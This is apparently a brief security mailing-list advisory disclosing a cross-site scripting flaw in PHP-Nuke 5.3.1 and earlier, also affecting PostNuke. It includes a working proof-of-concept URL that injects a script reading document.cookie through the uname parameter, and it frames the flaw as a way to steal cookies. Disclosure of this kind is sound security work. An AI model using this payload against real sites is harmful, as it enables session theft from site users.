Phpnuke Cross site scripting vulnerability

[Cabezon Aurélien <aurelien.cabezon () isecurelabs com>]

Hi nuke webmasters,

Phpnuke cross site scripting vulnerability
Affected version : 5.3.1 and prior perhaps other...perhaps all
PostNuke affected too.

No more explanation, it is enough with cross site scripting...i'm bored with
CSS vuln ;)
http://www.phpnuke.org/user.php?op=userinfo&uname=<script>alert(document.coo
kie);</script>

This is an other way to stole cookies as i explain in my previous post but
without using IE 5.5 vulnerability.
http://www.isecurelabs.com/article.php?sid=230

regards,

---
Cabezon Aurélien
http://www.iSecureLabs.com